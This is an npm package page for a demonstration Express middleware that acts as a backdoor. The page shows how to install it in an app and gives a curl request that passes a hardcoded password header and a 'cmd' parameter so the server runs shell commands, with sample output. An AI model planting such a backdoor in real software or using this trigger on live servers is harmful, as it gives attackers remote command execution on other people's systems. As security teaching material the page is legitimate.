Bad-idea-express-backdoor NPM

bad-idea-express-backdoor

express middleware containing a backdoor

for demonstration purposes only

usage

const express = require("express")
const expressBackdoor = require("bad-idea-express-backdoor")

const app = express();

app.use(expressBackdoor())

app.get("/", (req, res)=>{
  res.send("Hello Chrome User!")
})

app.listen(8080)

try it

node example.js

in another terminal, send commands to the backdoor

$ curl -H 'knock_knock: p@ssw0rd1234' 'localhost:8080?cmd=uname%20-a'
{
  "err": null,
  "stdout": "Linux roon 5.0.0-38-generic #41-Ubuntu SMP Tue Dec 3 00:27:35 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux\n",
  "stderr": ""
}%

@everything-registry/sub-chunk-1210 @zalastax/nolb-bad

0.0.1-security

3 years ago

2.0.0

3 years ago

1.0.1

3 years ago